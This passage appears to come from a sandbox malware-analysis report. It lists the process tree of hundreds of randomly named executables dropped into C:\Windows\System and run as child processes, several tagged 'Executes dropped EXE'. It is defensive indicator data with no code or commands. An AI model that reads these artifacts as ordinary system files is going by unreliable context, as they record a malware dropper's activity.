  C:\Windows\System\XhbZCiQ.exe
  2⤵
  - Executes dropped EXE
  PID:3580
- C:\Windows\System\CgwUuBt.exe
  C:\Windows\System\CgwUuBt.exe
  2⤵
  - Executes dropped EXE
  PID:2280
- C:\Windows\System\lRdWZgZ.exe
  C:\Windows\System\lRdWZgZ.exe
  2⤵
  - Executes dropped EXE
  PID:1224
- C:\Windows\System\JUydtmi.exe
  C:\Windows\System\JUydtmi.exe
  2⤵
  - Executes dropped EXE
  PID:3360
- C:\Windows\System\sfNjwMl.exe
  C:\Windows\System\sfNjwMl.exe
  2⤵
  - Executes dropped EXE
  PID:4900
- C:\Windows\System\zUIhJKW.exe
  C:\Windows\System\zUIhJKW.exe
  2⤵
  - Executes dropped EXE
  PID:4920
- C:\Windows\System\ddRWnkg.exe
  C:\Windows\System\ddRWnkg.exe
  2⤵
  - Executes dropped EXE
  PID:2840
- C:\Windows\System\zOFNLuI.exe
  C:\Windows\System\zOFNLuI.exe
  2⤵
  - Executes dropped EXE
  PID:3020
- C:\Windows\System\GnhDkNI.exe
  C:\Windows\System\GnhDkNI.exe
  2⤵
  - Executes dropped EXE
  PID:3412
- C:\Windows\System\MhwQjSz.exe
  C:\Windows\System\MhwQjSz.exe
  2⤵
  - Executes dropped EXE
  PID:4176
- C:\Windows\System\hxDkrLy.exe
  C:\Windows\System\hxDkrLy.exe
  2⤵
  - Executes dropped EXE
  PID:3060
- C:\Windows\System\ftTWFVH.exe
  C:\Windows\System\ftTWFVH.exe
  2⤵
  - Executes dropped EXE
  PID:4728
- C:\Windows\System\REjGJku.exe
  C:\Windows\System\REjGJku.exe
  2⤵
  - Executes dropped EXE
  PID:1412
- C:\Windows\System\UcboLIU.exe
  C:\Windows\System\UcboLIU.exe
  2⤵
  - Executes dropped EXE
  PID:1120
- C:\Windows\System\FVbcSBx.exe
  C:\Windows\System\FVbcSBx.exe
  2⤵
  - Executes dropped EXE
  PID:2492
- C:\Windows\System\RsqFPzF.exe
  C:\Windows\System\RsqFPzF.exe
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\Windows\System\pLsmScc.exe
  C:\Windows\System\pLsmScc.exe
  2⤵
  - Executes dropped EXE
  PID:2288
- C:\Windows\System\VyWQkOi.exe
  C:\Windows\System\VyWQkOi.exe
  2⤵
  - Executes dropped EXE
  PID:2244
- C:\Windows\System\YyqRSif.exe
  C:\Windows\System\YyqRSif.exe
  2⤵
  - Executes dropped EXE
  PID:1680
- C:\Windows\System\hfPhokW.exe
  C:\Windows\System\hfPhokW.exe
  2⤵
  - Executes dropped EXE
  PID:4892
- C:\Windows\System\pTbGpAb.exe
  C:\Windows\System\pTbGpAb.exe
  2⤵
  - Executes dropped EXE
  PID:1464
- C:\Windows\System\OaYHsSE.exe
  C:\Windows\System\OaYHsSE.exe
  2⤵
  - Executes dropped EXE
  PID:2984
- C:\Windows\System\nOzzDvG.exe
  C:\Windows\System\nOzzDvG.exe
  2⤵
  - Executes dropped EXE
  PID:3420
- C:\Windows\System\MUXqNpX.exe
  C:\Windows\System\MUXqNpX.exe
  2⤵
  - Executes dropped EXE
  PID:3684
- C:\Windows\System\dhemsmB.exe
  C:\Windows\System\dhemsmB.exe
  2⤵
  - Executes dropped EXE
  PID:2928
- C:\Windows\System\Ejchioq.exe
  C:\Windows\System\Ejchioq.exe
  2⤵
  - Executes dropped EXE
  PID:996
- C:\Windows\System\OMiKNmp.exe
  C:\Windows\System\OMiKNmp.exe
  2⤵
  - Executes dropped EXE
  PID:3268
- C:\Windows\System\uRodupl.exe
  C:\Windows\System\uRodupl.exe
  2⤵
  - Executes dropped EXE
  PID:372
- C:\Windows\System\jzHjRWu.exe
  C:\Windows\System\jzHjRWu.exe
  2⤵
  - Executes dropped EXE
  PID:4556
- C:\Windows\System\QDyBaaU.exe
  C:\Windows\System\QDyBaaU.exe
  2⤵
  - Executes dropped EXE
  PID:4756
- C:\Windows\System\VRlLmjn.exe
  C:\Windows\System\VRlLmjn.exe
  2⤵
  - Executes dropped EXE
  PID:2208
- C:\Windows\System\szaLPZl.exe
  C:\Windows\System\szaLPZl.exe
  2⤵
  - Executes dropped EXE
  PID:4524
- C:\Windows\System\pHDoQwt.exe
  C:\Windows\System\pHDoQwt.exe
  2⤵
  - Executes dropped EXE
  PID:3284
- C:\Windows\System\cEjycWp.exe
  C:\Windows\System\cEjycWp.exe
  2⤵
  - Executes dropped EXE
  PID:2704
- C:\Windows\System\jOyyWqc.exe
  C:\Windows\System\jOyyWqc.exe
  2⤵
  - Executes dropped EXE
  PID:2744
- C:\Windows\System\SOgBvxZ.exe
  C:\Windows\System\SOgBvxZ.exe
  2⤵
  - Executes dropped EXE
  PID:2672
- C:\Windows\System\GldXRBq.exe
  C:\Windows\System\GldXRBq.exe
  2⤵
  - Executes dropped EXE
  PID:5056
- C:\Windows\System\WdvyOWa.exe
  C:\Windows\System\WdvyOWa.exe
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Windows\System\ihiWvOA.exe
  C:\Windows\System\ihiWvOA.exe
  2⤵
  - Executes dropped EXE
  PID:4340
- C:\Windows\System\ZDNPMJe.exe
  C:\Windows\System\ZDNPMJe.exe
  2⤵
  - Executes dropped EXE
  PID:2732
- C:\Windows\System\jxKaxgz.exe
  C:\Windows\System\jxKaxgz.exe
  2⤵
  - Executes dropped EXE
  PID:2176
- C:\Windows\System\Reyripw.exe
  C:\Windows\System\Reyripw.exe
  2⤵
  - Executes dropped EXE
  PID:1724
- C:\Windows\System\jbqwyvq.exe
  C:\Windows\System\jbqwyvq.exe
  2⤵
  - Executes dropped EXE
  PID:3144
- C:\Windows\System\vJyRqsY.exe
  C:\Windows\System\vJyRqsY.exe
  2⤵
  - Executes dropped EXE
  PID:3536
- C:\Windows\System\HvRiInw.exe
  C:\Windows\System\HvRiInw.exe
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Windows\System\oaNuEts.exe
  C:\Windows\System\oaNuEts.exe
  2⤵
  - Executes dropped EXE
  PID:3380
- C:\Windows\System\oZHfOKk.exe
  C:\Windows\System\oZHfOKk.exe
  2⤵
  - Executes dropped EXE
  PID:1628
- C:\Windows\System\IERFhSl.exe
  C:\Windows\System\IERFhSl.exe
  2⤵
  - Executes dropped EXE
  PID:4388
- C:\Windows\System\EAniMpe.exe
  C:\Windows\System\EAniMpe.exe
  2⤵
  - Executes dropped EXE
  PID:4692
- C:\Windows\System\TaEsDJK.exe
  C:\Windows\System\TaEsDJK.exe
  2⤵
  - Executes dropped EXE
  PID:4792
- C:\Windows\System\eTJYYrW.exe
  C:\Windows\System\eTJYYrW.exe
  2⤵
  - Executes dropped EXE
  PID:4476
- C:\Windows\System\lJpLGTY.exe
  C:\Windows\System\lJpLGTY.exe
  2⤵
  - Executes dropped EXE
  PID:4648
- C:\Windows\System\DqtWylc.exe
  C:\Windows\System\DqtWylc.exe
  2⤵
  - Executes dropped EXE
  PID:2016
- C:\Windows\System\fAwIznb.exe
  C:\Windows\System\fAwIznb.exe
  2⤵
  - Executes dropped EXE
  PID:4088
- C:\Windows\System\rXHxzGP.exe
  C:\Windows\System\rXHxzGP.exe
  2⤵
  - Executes dropped EXE
  PID:1104
- C:\Windows\System\Tqybgfp.exe
  C:\Windows\System\Tqybgfp.exe
  2⤵
  - Executes dropped EXE
  PID:2200
- C:\Windows\System\atYRtHS.exe
  C:\Windows\System\atYRtHS.exe
  2⤵
  PID:3908
- C:\Windows\System\RtoZyoU.exe
  C:\Windows\System\RtoZyoU.exe
  2⤵
  PID:1452
- C:\Windows\System\IMGegjV.exe
  C:\Windows\System\IMGegjV.exe
  2⤵
  PID:5016
- C:\Windows\System\eeFPzKg.exe
  C:\Windows\System\eeFPzKg.exe
  2⤵
  PID:1480
- C:\Windows\System\vshbeGu.exe
  C:\Windows\System\vshbeGu.exe
  2⤵
  PID:5144
- C:\Windows\System\AjIflEj.exe
  C:\Windows\System\AjIflEj.exe
  2⤵
  PID:5172
- C:\Windows\System\KVUgygA.exe
  C:\Windows\System\KVUgygA.exe
  2⤵
  PID:5204
- C:\Windows\System\GzuJUPH.exe
  C:\Windows\System\GzuJUPH.exe
  2⤵
  PID:5228
- C:\Windows\System\QRbqwWK.exe
  C:\Windows\System\QRbqwWK.exe
  2⤵
  PID:5256
- C:\Windows\System\rQPeNxe.exe
  C:\Windows\System\rQPeNxe.exe
  2⤵
  PID:5288
- C:\Windows\System\wluroMn.exe
  C:\Windows\System\wluroMn.exe
  2⤵
  PID:5320
- C:\Windows\System\doErgKk.exe
  C:\Windows\System\doErgKk.exe
  2⤵
  PID:5344
- C:\Windows\System\QmmQQzw.exe
  C:\Windows\System\QmmQQzw.exe
  2⤵
  PID:5372
- C:\Windows\System\uqVDsdn.exe
  C:\Windows\System\uqVDsdn.exe
  2⤵
  PID:5400
- C:\Windows\System\hTBqqJS.exe
  C:\Windows\System\hTBqqJS.exe
  2⤵
  PID:5432
- C:\Windows\System\hleXMiI.exe
  C:\Windows\System\hleXMiI.exe
  2⤵
  PID:5456
- C:\Windows\System\VKJVcPk.exe
  C:\Windows\System\VKJVcPk.exe
  2⤵
  PID:5484
- C:\Windows\System\MDpBYko.exe
  C:\Windows\System\MDpBYko.exe
  2⤵
  PID:5512
- C:\Windows\System\KCqbkrg.exe
  C:\Windows\System\KCqbkrg.exe
  2⤵
  PID:5572
- C:\Windows\System\RrFJedf.exe
  C:\Windows\System\RrFJedf.exe
  2⤵
  PID:5592
- C:\Windows\System\ORwHtts.exe
  C:\Windows\System\ORwHtts.exe
  2⤵
  PID:5608
- C:\Windows\System\WholwqS.exe
  C:\Windows\System\WholwqS.exe
  2⤵
  PID:5632
- C:\Windows\System\JViFSXX.exe
  C:\Windows\System\JViFSXX.exe
  2⤵
  PID:5660
- C:\Windows\System\pAYJzyd.exe
  C:\Windows\System\pAYJzyd.exe
  2⤵
  PID:5680
- C:\Windows\System\NNlXuFI.exe
  C:\Windows\System\NNlXuFI.exe
  2⤵
  PID:5708
- C:\Windows\System\FDbxKNx.exe
  C:\Windows\System\FDbxKNx.exe
  2⤵
  PID:5732
- C:\Windows\System\Bkptoxf.exe
  C:\Windows\System\Bkptoxf.exe
  2⤵
  PID:5764
- C:\Windows\System\vhmUpBq.exe
  C:\Windows\System\vhmUpBq.exe
  2⤵
  PID:5808
- C:\Windows\System\fmpxyJr.exe
  C:\Windows\System\fmpxyJr.exe
  2⤵
  PID:5832
- C:\Windows\System\zemGGKx.exe
  C:\Windows\System\zemGGKx.exe
  2⤵
  PID:5852
- C:\Windows\System\rNXarww.exe
  C:\Windows\System\rNXarww.exe
  2⤵
  PID:5884
- C:\Windows\System\uWzkrGW.exe
  C:\Windows\System\uWzkrGW.exe
  2⤵
  PID:5908
- C:\Windows\System\HesKXGr.exe
  C:\Windows\System\HesKXGr.exe
  2⤵
  PID:5928
- C:\Windows\System\LaTuEOy.exe
  C:\Windows\System\LaTuEOy.exe
  2⤵
  PID:5960
- C:\Windows\System\VNyPkUd.exe
  C:\Windows\System\VNyPkUd.exe
  2⤵
  PID:5980
- C:\Windows\System\lLyDgde.exe
  C:\Windows\System\lLyDgde.exe
  2⤵
  PID:6024
- C:\Windows\System\uOWOEaV.exe
  C:\Windows\System\uOWOEaV.exe
  2⤵
  PID:6052
- C:\Windows\System\VUdIfCq.exe
  C:\Windows\System\VUdIfCq.exe
  2⤵
  PID:6068
- C:\Windows\System\JZKCuDQ.exe
  C:\Windows\System\JZKCuDQ.exe
  2⤵
  PID:6096
- C:\Windows\System\vMsmnxI.exe
  C:\Windows\System\vMsmnxI.exe
  2⤵
  PID:6112
- C:\Windows\System\BBTHtgs.exe
  C:\Windows\System\BBTHtgs.exe
  2⤵
  PID:6132
- C:\Windows\System\IvrAAaU.exe
  C:\Windows\System\IvrAAaU.exe
  2⤵
  PID:3696
- C:\Windows\System\AecjdGA.exe
  C:\Windows\System\AecjdGA.exe
  2⤵
  PID:4560
- C:\Windows\System\fFquYcV.exe
  C:\Windows\System\fFquYcV.exe
  2⤵
  PID:2236
- C:\Windows\System\viCmbaK.exe
  C:\Windows\System\viCmbaK.exe
  2⤵
  PID:3188
- C:\Windows\System\npHUkQI.exe
  C:\Windows\System\npHUkQI.exe
  2⤵
  PID:5184
- C:\Windows\System\hwdHLQl.exe
  C:\Windows\System\hwdHLQl.exe
  2⤵
  PID:5224
- C:\Windows\System\RynZORn.exe
  C:\Windows\System\RynZORn.exe
  2⤵
  PID:5280
- C:\Windows\System\aYsllMO.exe
  C:\Windows\System\aYsllMO.exe
  2⤵
  PID:8
- C:\Windows\System\hFqLqyd.exe
  C:\Windows\System\hFqLqyd.exe
  2⤵
  PID:5440
- C:\Windows\System\xuUJWqx.exe
  C:\Windows\System\xuUJWqx.exe
  2⤵
  PID:2848
- C:\Windows\System\JjVdUij.exe
  C:\Windows\System\JjVdUij.exe
  2⤵
  PID:5620
- C:\Windows\System\zwrHokE.exe
  C:\Windows\System\zwrHokE.exe
  2⤵
  PID:5652
- C:\Windows\System\mwgdTxW.exe
  C:\Windows\System\mwgdTxW.exe
  2⤵
  PID:2844
- C:\Windows\System\GTBHYvT.exe
  C:\Windows\System\GTBHYvT.exe
  2⤵
  PID:5724
- C:\Windows\System\RhHSrUN.exe
  C:\Windows\System\RhHSrUN.exe
  2⤵
  PID:2420
- C:\Windows\System\ZFdWDOn.exe
  C:\Windows\System\ZFdWDOn.exe
  2⤵
  PID:5752
- C:\Windows\System\uBehlpT.exe
  C:\Windows\System\uBehlpT.exe
  2⤵
  PID:5864
- C:\Windows\System\ycRJdfd.exe
  C:\Windows\System\ycRJdfd.exe
  2⤵
  PID:5848
- C:\Windows\System\FSopCvd.exe
  C:\Windows\System\FSopCvd.exe
  2⤵
  PID:5040
- C:\Windows\System\lPKXtQZ.exe
  C:\Windows\System\lPKXtQZ.exe
  2⤵
  PID:3560
- C:\Windows\System\qmiSrbS.exe
  C:\Windows\System\qmiSrbS.exe
  2⤵
  PID:5920
- C:\Windows\System\TTSKIcI.exe
  C:\Windows\System\TTSKIcI.exe
  2⤵
  PID:752
- C:\Windows\System\QHAFGFi.exe
  C:\Windows\System\QHAFGFi.exe
  2⤵
  PID:6020
- C:\Windows\System\MojOZMg.exe
  C:\Windows\System\MojOZMg.exe
  2⤵
  PID:3488
- C:\Windows\System\JmOYWkI.exe
  C:\Windows\System\JmOYWkI.exe
  2⤵
  PID:6064
- C:\Windows\System\TSFdhnd.exe
  C:\Windows\System\TSFdhnd.exe
  2⤵
  PID:4956
- C:\Windows\System\QFlSyYU.exe
  C:\Windows\System\QFlSyYU.exe
  2⤵
  PID:3592
- C:\Windows\System\xSRehOc.exe
  C:\Windows\System\xSRehOc.exe
  2⤵
  PID:5308
- C:\Windows\System\BQNDPGI.exe
  C:\Windows\System\BQNDPGI.exe
  2⤵
  PID:5220
- C:\Windows\System\nYGGVYv.exe
  C:\Windows\System\nYGGVYv.exe
  2⤵
  PID:5360
- C:\Windows\System\eKvuRZn.exe
  C:\Windows\System\eKvuRZn.exe
  2⤵
  PID:4724
- C:\Windows\System\qKwgLen.exe
  C:\Windows\System\qKwgLen.exe
  2⤵
  PID:5672
- C:\Windows\System\qiFoFGr.exe
  C:\Windows\System\qiFoFGr.exe
  2⤵
  PID:3944
- C:\Windows\System\AVFQGlJ.exe
  C:\Windows\System\AVFQGlJ.exe
  2⤵
  PID:5816
- C:\Windows\System\cpizUNs.exe
  C:\Windows\System\cpizUNs.exe
  2⤵
  PID:4224
- C:\Windows\System\ycSRXSU.exe
  C:\Windows\System\ycSRXSU.exe
  2⤵
  PID:3692
- C:\Windows\System\tBaMlft.exe
  C:\Windows\System\tBaMlft.exe
  2⤵
  PID:6012
- C:\Windows\System\EaKUSsm.exe
  C:\Windows\System\EaKUSsm.exe
  2⤵
  PID:2836
- C:\Windows\System\gvtMZOM.exe
  C:\Windows\System\gvtMZOM.exe
  2⤵
  PID:572
- C:\Windows\System\kFdZZtG.exe
  C:\Windows\System\kFdZZtG.exe
  2⤵
  PID:5192
- C:\Windows\System\BQoHqjR.exe
  C:\Windows\System\BQoHqjR.exe
  2⤵
  PID:5792
- C:\Windows\System\FKguqob.exe
  C:\Windows\System\FKguqob.exe
  2⤵
  PID:5784
- C:\Windows\System\GlrOshy.exe
  C:\Windows\System\GlrOshy.exe
  2⤵
  PID:5168
- C:\Windows\System\FCokhGy.exe
  C:\Windows\System\FCokhGy.exe
  2⤵
  PID:5568
- C:\Windows\System\XYddYQw.exe
  C:\Windows\System\XYddYQw.exe
  2⤵
  PID:5956
- C:\Windows\System\BSpsTwA.exe
  C:\Windows\System\BSpsTwA.exe
  2⤵
  PID:5528
- C:\Windows\System\uqKoDjx.exe
  C:\Windows\System\uqKoDjx.exe
  2⤵
  PID:6152
- C:\Windows\System\gYDiTdK.exe
  C:\Windows\System\gYDiTdK.exe
  2⤵
  PID:6176
- C:\Windows\System\GurqEqA.exe
  C:\Windows\System\GurqEqA.exe
  2⤵
  PID:6196
- C:\Windows\System\swmCNuM.exe
  C:\Windows\System\swmCNuM.exe
  2⤵
  PID:6236
- C:\Windows\System\UAuFgFY.exe
  C:\Windows\System\UAuFgFY.exe
  2⤵
  PID:6252
- C:\Windows\System\OwNYbSg.exe
  C:\Windows\System\OwNYbSg.exe
  2⤵
  PID:6268
- C:\Windows\System\QTIzIdm.exe
  C:\Windows\System\QTIzIdm.exe
  2⤵
  PID:6288
- C:\Windows\System\biocJzg.exe
  C:\Windows\System\biocJzg.exe
  2⤵
  PID:6304
- C:\Windows\System\NumvVIW.exe
  C:\Windows\System\NumvVIW.exe
  2⤵
  PID:6328
- C:\Windows\System\ZBOsfRk.exe
  C:\Windows\System\ZBOsfRk.exe
  2⤵
  PID:6352
- C:\Windows\System\vddjVxq.exe
  C:\Windows\System\vddjVxq.exe
  2⤵
  PID:6368
- C:\Windows\System\ddVIfIB.exe
  C:\Windows\System\ddVIfIB.exe
  2⤵
  PID:6392
- C:\Windows\System\sLMAURK.exe
  C:\Windows\System\sLMAURK.exe
  2⤵
  PID:6416
- C:\Windows\System\HwPCWnm.exe
  C:\Windows\System\HwPCWnm.exe
  2⤵
  PID:6432
- C:\Windows\System\NmApilW.exe
  C:\Windows\System\NmApilW.exe
  2⤵
  PID:6448
- C:\Windows\System\lHFQLTQ.exe
  C:\Windows\System\lHFQLTQ.exe
  2⤵
  PID:6464
- C:\Windows\System\soABrRz.exe
  C:\Windows\System\soABrRz.exe
  2⤵
  PID:6484
- C:\Windows\System\scQVnXz.exe
  C:\Windows\System\scQVnXz.exe
  2⤵
  PID:6556
- C:\Windows\System\ypriLQU.exe
  C:\Windows\System\ypriLQU.exe
  2⤵
  PID:6592
- C:\Windows\System\XRFtrYd.exe
  C:\Windows\System\XRFtrYd.exe
  2⤵
  PID:6612
- C:\Windows\System\JMQKTXX.exe
  C:\Windows\System\JMQKTXX.exe
  2⤵
  PID:6632
- C:\Windows\System\CdZhHkK.exe
  C:\Windows\System\CdZhHkK.exe
  2⤵
  PID:6656
- C:\Windows\System\kydTbOo.exe
  C:\Windows\System\kydTbOo.exe
  2⤵
  PID:6676
- C:\Windows\System\wjQqIpY.exe
  C:\Windows\System\wjQqIpY.exe
  2⤵
  PID:6772
- C:\Windows\System\zcsueuZ.exe
  C:\Windows\System\zcsueuZ.exe
  2⤵
  PID:6792
- C:\Windows\System\ZoyLLPg.exe
  C:\Windows\System\ZoyLLPg.exe
  2⤵
  PID:6856
- C:\Windows\System\vTEiJnL.exe
  C:\Windows\System\vTEiJnL.exe
  2⤵
  PID:6908
- C:\Windows\System\gbNudOs.exe
  C:\Windows\System\gbNudOs.exe
  2⤵
  PID:6928
- C:\Windows\System\ymqzHoG.exe
  C:\Windows\System\ymqzHoG.exe
  2⤵
  PID:6952
- C:\Windows\System\oAJUrSJ.exe
  C:\Windows\System\oAJUrSJ.exe
  2⤵
  PID:6976
- C:\Windows\System\TnbtzMj.exe
  C:\Windows\System\TnbtzMj.exe
  2⤵
  PID:6996
- C:\Windows\System\MjppwYR.exe
  C:\Windows\System\MjppwYR.exe
  2⤵
  PID:7012
- C:\Windows\System\QuErEHR.exe
  C:\Windows\System\QuErEHR.exe
  2⤵
  PID:7032
- C:\Windows\System\GifYPtD.exe
  C:\Windows\System\GifYPtD.exe
  2⤵
  PID:7048
- C:\Windows\System\qMjyLjN.exe
  C:\Windows\System\qMjyLjN.exe
  2⤵
  PID:7076
- C:\Windows\System\wMkNqss.exe
  C:\Windows\System\wMkNqss.exe
  2⤵
  PID:7096
- C:\Windows\System\AEkVLKZ.exe
  C:\Windows\System\AEkVLKZ.exe
  2⤵
  PID:7124
- C:\Windows\System\qaqEwUq.exe
  C:\Windows\System\qaqEwUq.exe
  2⤵
  PID:7140
- C:\Windows\System\duMOtpM.exe
  C:\Windows\System\duMOtpM.exe
  2⤵
  PID:7164
- C:\Windows\System\jsdgXNA.exe
  C:\Windows\System\jsdgXNA.exe
  2⤵
  PID:6212
- C:\Windows\System\qAAsonV.exe
  C:\Windows\System\qAAsonV.exe
  2⤵
  PID:6264
- C:\Windows\System\uPwxyRQ.exe
  C:\Windows\System\uPwxyRQ.exe
  2⤵
  PID:6312
- C:\Windows\System\WyEHpuN.exe
  C:\Windows\System\WyEHpuN.exe
  2⤵
  PID:6364
- C:\Windows\System\wYfMeal.exe
  C:\Windows\System\wYfMeal.exe
  2⤵
  PID:6584
- C:\Windows\System\fVKQjJn.exe
  C:\Windows\System\fVKQjJn.exe
  2⤵
  PID:6684
- C:\Windows\System\cbMiQjj.exe
  C:\Windows\System\cbMiQjj.exe
  2⤵
  PID:6640
- C:\Windows\System\hfnRWPv.exe
  C:\Windows\System\hfnRWPv.exe
  2⤵
  PID:6732
- C:\Windows\System\RcBbFns.exe
  C:\Windows\System\RcBbFns.exe
  2⤵
  PID:6740
- C:\Windows\System\wwybbxm.exe
  C:\Windows\System\wwybbxm.exe
  2⤵
  PID:6880
- C:\Windows\System\nnhBAwf.exe
  C:\Windows\System\nnhBAwf.exe
  2⤵
  PID:6936
- C:\Windows\System\DgBeQRp.exe
  C:\Windows\System\DgBeQRp.exe
  2⤵
  PID:6968
- C:\Windows\System\evUiMII.exe
  C:\Windows\System\evUiMII.exe
  2⤵
  PID:5084
- C:\Windows\System\QTpKWTc.exe
  C:\Windows\System\QTpKWTc.exe
  2⤵
  PID:7092
- C:\Windows\System\qBEqVPt.exe
  C:\Windows\System\qBEqVPt.exe
  2⤵
  PID:7028
- C:\Windows\System\TtIyHtf.exe
  C:\Windows\System\TtIyHtf.exe
  2⤵
  PID:6188
- C:\Windows\System\vrHoong.exe
  C:\Windows\System\vrHoong.exe
  2⤵
  PID:6248
- C:\Windows\System\EQTKmsU.exe
  C:\Windows\System\EQTKmsU.exe
  2⤵
  PID:6428
- C:\Windows\System\zyBMsJf.exe
  C:\Windows\System\zyBMsJf.exe
  2⤵
  PID:6504
- C:\Windows\System\vrKkPeb.exe
  C:\Windows\System\vrKkPeb.exe
  2⤵
  PID:6604
- C:\Windows\System\SpoRmrb.exe
  C:\Windows\System\SpoRmrb.exe
  2⤵
  PID:6668
- C:\Windows\System\oZuFoPb.exe
  C:\Windows\System\oZuFoPb.exe
  2⤵
  PID:6924
- C:\Windows\System\duSlAJB.exe
  C:\Windows\System\duSlAJB.exe
  2⤵
  PID:6960
- C:\Windows\System\sUnulwY.exe
  C:\Windows\System\sUnulwY.exe
  2⤵
  PID:7148
- C:\Windows\System\QdtOOvr.exe
  C:\Windows\System\QdtOOvr.exe
  2⤵
  PID:4020
- C:\Windows\System\xcGjqIC.exe
  C:\Windows\System\xcGjqIC.exe
  2⤵
  PID:6300
- C:\Windows\System\fcFPKYj.exe
  C:\Windows\System\fcFPKYj.exe
  2⤵
  PID:6536
- C:\Windows\System\NAVTykE.exe
  C:\Windows\System\NAVTykE.exe
  2⤵
  PID:4668
- C:\Windows\System\oASGWAJ.exe
  C:\Windows\System\oASGWAJ.exe
  2⤵
  PID:6900
- C:\Windows\System\FpywUYi.exe
  C:\Windows\System\FpywUYi.exe
  2⤵
  PID:4004
- C:\Windows\System\LVoLQZK.exe
  C:\Windows\System\LVoLQZK.exe
  2⤵
  PID:4232
- C:\Windows\System\sBPixvF.exe
  C:\Windows\System\sBPixvF.exe
  2⤵
  PID:6784
- C:\Windows\System\DraXMJj.exe
  C:\Windows\System\DraXMJj.exe
  2⤵
  PID:7200
- C:\Windows\System\SSsJPvH.exe
  C:\Windows\System\SSsJPvH.exe
  2⤵
  PID:7216
- C:\Windows\System\DRpcpkI.exe
  C:\Windows\System\DRpcpkI.exe
  2⤵
  PID:7240
- C:\Windows\System\RbWFqBv.exe
  C:\Windows\System\RbWFqBv.exe
  2⤵
  PID:7264
- C:\Windows\System\PlKFSYa.exe
  C:\Windows\System\PlKFSYa.exe
  2⤵
  PID:7284
- C:\Windows\System\uQjuOPs.exe
  C:\Windows\System\uQjuOPs.exe
  2⤵
  PID:7300
- C:\Windows\System\hMnvxcb.exe
  C:\Windows\System\hMnvxcb.exe
  2⤵
  PID:7324
- C:\Windows\System\JFAcvzA.exe
  C:\Windows\System\JFAcvzA.exe
  2⤵
  PID:7372
- C:\Windows\System\MxcfTZz.exe
  C:\Windows\System\MxcfTZz.exe
  2⤵
  PID:7412
- C:\Windows\System\HMaFKzH.exe
  C:\Windows\System\HMaFKzH.exe
  2⤵
  PID:7432
- C:\Windows\System\GQCMKVT.exe
  C:\Windows\System\GQCMKVT.exe
  2⤵
  PID:7456
- C:\Windows\System\RGQQazQ.exe
  C:\Windows\System\RGQQazQ.exe
  2⤵
  PID:7476
- C:\Windows\System\gUFWJPT.exe
  C:\Windows\System\gUFWJPT.exe
  2⤵
  PID:7552
- C:\Windows\System\BdYUooP.exe
  C:\Windows\System\BdYUooP.exe
  2⤵
  PID:7572
- C:\Windows\System\Dwrpovf.exe
  C:\Windows\System\Dwrpovf.exe
  2⤵
  PID:7608
- C:\Windows\System\oRXlQbK.exe
  C:\Windows\System\oRXlQbK.exe
  2⤵
  PID:7632
- C:\Windows\System\bggLnFe.exe
  C:\Windows\System\bggLnFe.exe
  2⤵
  PID:7652
- C:\Windows\System\TQnATcE.exe
  C:\Windows\System\TQnATcE.exe
  2⤵
  PID:7680
- C:\Windows\System\TBpGWxc.exe
  C:\Windows\System\TBpGWxc.exe
  2⤵
  PID:7704
- C:\Windows\System\aUSZsxB.exe
  C:\Windows\System\aUSZsxB.exe
  2⤵
  PID:7748
- C:\Windows\System\dUpjfjE.exe
  C:\Windows\System\dUpjfjE.exe
  2⤵
  PID:7788
- C:\Windows\System\zWnbYAG.exe
  C:\Windows\System\zWnbYAG.exe
  2⤵
  PID:7816
- C:\Windows\System\zMIFGJe.exe
  C:\Windows\System\zMIFGJe.exe
  2⤵
  PID:7856
- C:\Windows\System\MbMgVOO.exe
  C:\Windows\System\MbMgVOO.exe
  2⤵
  PID:7880
- C:\Windows\System\toxGqPZ.exe
  C:\Windows\System\toxGqPZ.exe
  2⤵
  PID:7900
- C:\Windows\System\gJvRlTO.exe
  C:\Windows\System\gJvRlTO.exe
  2⤵
  PID:7920
- C:\Windows\System\TtKINsK.exe
  C:\Windows\System\TtKINsK.exe
  2⤵
  PID:7944
- C:\Windows\System\keeXdlP.exe
  C:\Windows\System\keeXdlP.exe
  2⤵
  PID:7960
- C:\Windows\System\nDFCLaL.exe
  C:\Windows\System\nDFCLaL.exe
  2⤵
  PID:7984
- C:\Windows\System\jLATOZP.exe
  C:\Windows\System\jLATOZP.exe
  2⤵
  PID:8044
- C:\Windows\System\Qtwdyuc.exe
  C:\Windows\System\Qtwdyuc.exe
  2⤵
  PID:8080
- C:\Windows\System\brsgYrM.exe
  C:\Windows\System\brsgYrM.exe
  2⤵
  PID:8104
- C:\Windows\System\OfBRbVu.exe
  C:\Windows\System\OfBRbVu.exe
  2⤵
  PID:8124
- C:\Windows\System\azDHxDQ.exe
  C:\Windows\System\azDHxDQ.exe
  2⤵
  PID:8164
- C:\Windows\System\rHFmhRD.exe
  C:\Windows\System\rHFmhRD.exe
  2⤵
  PID:8188
- C:\Windows\System\hyMrsdK.exe
  C:\Windows\System\hyMrsdK.exe
  2⤵
  PID:4328
- C:\Windows\System\CEoHPNm.exe
  C:\Windows\System\CEoHPNm.exe
  2⤵
  PID:7292
- C:\Windows\System\pvnDdhE.exe
  C:\Windows\System\pvnDdhE.exe
  2⤵
  PID:7340
- C:\Windows\System\OvuPSKe.exe
  C:\Windows\System\OvuPSKe.exe
  2⤵
  PID:7360
- C:\Windows\System\djtdzGh.exe
  C:\Windows\System\djtdzGh.exe
  2⤵
  PID:7316
- C:\Windows\System\uFkSjNE.exe
  C:\Windows\System\uFkSjNE.exe
  2⤵
  PID:7472
- C:\Windows\System\cVwpMZC.exe
  C:\Windows\System\cVwpMZC.exe
  2⤵
  PID:7420
- C:\Windows\System\zuDzGJJ.exe
  C:\Windows\System\zuDzGJJ.exe
  2⤵
  PID:7496
- C:\Windows\System\VRYdKMM.exe
  C:\Windows\System\VRYdKMM.exe
  2⤵
  PID:7592
- C:\Windows\System\edRDerY.exe
  C:\Windows\System\edRDerY.exe
  2⤵
  PID:7720
- C:\Windows\System\qOZbJMO.exe
  C:\Windows\System\qOZbJMO.exe
  2⤵
  PID:7740
- C:\Windows\System\XixkPYy.exe
  C:\Windows\System\XixkPYy.exe
  2⤵
  PID:7780
- C:\Windows\System\KqOHqlP.exe
  C:\Windows\System\KqOHqlP.exe
  2⤵
  PID:7848
- C:\Windows\System\FoNXQRx.exe
  C:\Windows\System\FoNXQRx.exe
  2⤵
  PID:7916
- C:\Windows\System\HAzASzt.exe
  C:\Windows\System\HAzASzt.exe
  2⤵
  PID:8072
- C:\Windows\System\JvrlIRn.exe
